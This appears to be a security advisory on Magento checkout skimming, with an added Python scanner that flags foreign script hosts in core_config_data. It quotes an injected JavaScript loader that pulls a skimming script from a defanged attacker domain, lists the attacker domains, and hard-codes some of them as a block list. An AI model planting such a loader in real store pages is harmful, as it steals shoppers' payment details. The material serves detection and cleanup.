Description: Injection of malicious scripts into Magento checkout pages. The scripts steal entered payment details and send them to remote third-party sites.
The scripts are typically injected into the core_config_data table.
Sample:
<scri pt type="text/javascript">var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'controlmage[.]com/e/tracking.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);</script>
Domains involved: apissystem[.]com, codesmagento[.]com, controlmage[.]com, cdnppay[.]com, resselerratings[.]com, cdngoogle[.]com, apismanagers[.]com, verpayments[.]com, myageverify[.]com, assetsbraln[.]com, verpayment[.]com, magesources[.]com, traskedlink[.]com, magejavascripts[.]com, mjs24[.]com, m24js[.]com, cdnassels[.]com, magescripts[.]pw and jscriptscloud[.]com
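A defensive check built on the description above, added here as an example and not taken from the original page: it scans (path, value) rows exported from core_config_data for script sources whose host is not on the store's own allowlist. The function names, the sample rows and the `.example` hosts are constructed assumptions; the flagged domains are a subset of the list above.

```python
import re

# Subset of the domains listed above, kept defanged in source.
KNOWN_BAD = {"controlmage[.]com", "cdnppay[.]com", "magescripts[.]pw"}
# Matches a static src="..." attribute and a dynamic `po.src = '...'` assignment.
SRC_RE = re.compile(r"""src\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE)

def refang(text):
    """Undo the [.] defanging used in indicator lists."""
    return text.replace("[.]", ".")

def host_of(url):
    """Return the lowercase host of a script URL, or None for a relative path."""
    url = refang(url.strip())
    stripped = re.sub(r"^(?:[a-z][a-z0-9+.-]*:)?//", "", url, flags=re.IGNORECASE)
    host = re.split(r"[/?#:]", stripped, maxsplit=1)[0].lower()
    # Heuristic: without a scheme, treat "name.tld/path" (as in the sample) as a host.
    if stripped != url or ("." in host and "/" in stripped):
        return host or None
    return None

def scan_config(rows, allowed_hosts):
    """rows: (path, value) pairs exported from core_config_data.
    Returns (path, host, verdict) for each src= host outside allowed_hosts,
    looking only at values that contain script markup."""
    bad = {refang(d) for d in KNOWN_BAD}
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for path, value in rows:
        if not value or "script" not in value.lower():
            continue
        for raw in SRC_RE.findall(value):
            host = host_of(raw)
            if host is not None and host not in allowed:
                findings.append((path, host, "known-bad" if host in bad else "unknown"))
    return findings

# Constructed sample rows; the first follows the shape of the sample above.
SAMPLE_ROWS = [
    ("design/footer/absolute_footer",
     "<script type=\"text/javascript\">var po = document.createElement('script'); "
     "po.async = true; po.src = 'controlmage[.]com/e/tracking.js';</script>"),
    ("design/head/includes", '<script src="//cdn.shop.example/js/analytics.js"></script>'),
    ("design/head/includes", '<script src="https://stats.thirdparty.example/t.js"></script>'),
    ("web/unsecure/base_url", "https://shop.example/"),
]

if __name__ == "__main__":
    for finding in scan_config(SAMPLE_ROWS, {"shop.example", "cdn.shop.example"}):
        print(finding)
```

An "unknown" verdict is a prompt for review, not proof of compromise: legitimate third-party tags that are missing from the allowlist land there too.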
For additional details check the Ecommerce security category of our blog.
Affecting: Magento
Mitigation: How to clean a hacked Magento site